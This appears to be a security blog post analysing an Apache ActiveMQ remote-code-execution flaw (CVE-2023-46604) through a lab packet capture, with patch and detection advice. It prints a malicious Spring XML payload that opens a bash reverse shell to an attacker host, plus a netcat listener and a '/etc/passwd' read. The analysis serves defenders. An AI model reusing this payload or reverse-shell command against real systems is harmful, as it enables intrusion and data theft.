Last month, it was reported that Apache ActiveMQ was vulnerable to a critical attack, CVE-2023-46604, allowing attackers to run arbitrary shell commands. Apache quickly made a fix available, and ActiveMQ users can resolve this by upgrading to the following versions: 5.15.16, 5.16.7, 5.17.6, or 5.18.3. There have been multiple reports of this attack exploited in the wild:
In this article, we will dissect the details of the CVE-2023-46604 vulnerability affecting Apache ActiveMQ using an example packet capture.
At the heart of the vulnerability is the Java OpenWire protocol. Using a specially crafted message, the attacker can force the application to load an XML configuration file over HTTP. This XML file defines the code that the vulnerable machine runs. We were able to install a vulnerable instance of Apache ActiveMQ, and using this proof-of-concept from GitLab, we captured this example PCAP of this attack.
The attack starts with an OpenWire message from our attacker specifying an XML configuration file to load. In our capture, this file is located at http://172.16.3.190/poc.xml. Typically, an attacker will only host and serve this file and then remove it.
This OpenWire message causes the only severity level 1 alert detected using Threat Assessment and the ET Open Ruleset. This stream may be the only traffic saved by an IDS/IPS device. The full packet capture will show what XML file was downloaded after the attacker exploited the machine as long as the file is served using unencrypted HTTP. Without the XML file, determining what commands the attacker ran by exploiting this vulnerability may be much more challenging.
In our example with the full packet capture, in the next TCP stream, we can see the vulnerable machine downloading the following XML file:
<?xml version="1.0" encoding="UTF-8" ?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>bash</value> <value>-c</value> <value>bash -i >& /dev/tcp/172.16.3.209/9001 0>&1</value> </list> </constructor-arg> </bean> </beans>
When we put together the contents between the <value> tags and translate the HTML Symbol Entities, we find the following command:
bash -c bash -i >& /dev/tcp/172.16.3.209/9001 0>&1
This instructs the vulnerable server to start a reverse shell connected to 172.16.3.209 on port 9001. In our example capture, we can see the vulnerable server starting this TCP connection, which can traverse a NAT or basic firewall configuration as it is an outgoing connection.
On an attacker's machine, we have started a netcat server waiting for this connection by running 'nc -l 9001'. Once the vulnerable server makes this connection, the attacker sends the command 'cat /etc/passwd', which exfiltrates this data to our attacker's machine! This ladder diagram shows the vulnerable machine on the left and shows the entire attack.
Now that you've seen an example of the network traffic from an example exploitation of CVE-2023-46604, you can examine your own packet captures for indicators of compromise. Remember to check if you are running a vulnerable version of Apache ActiveMQ and patch it immediately if you are!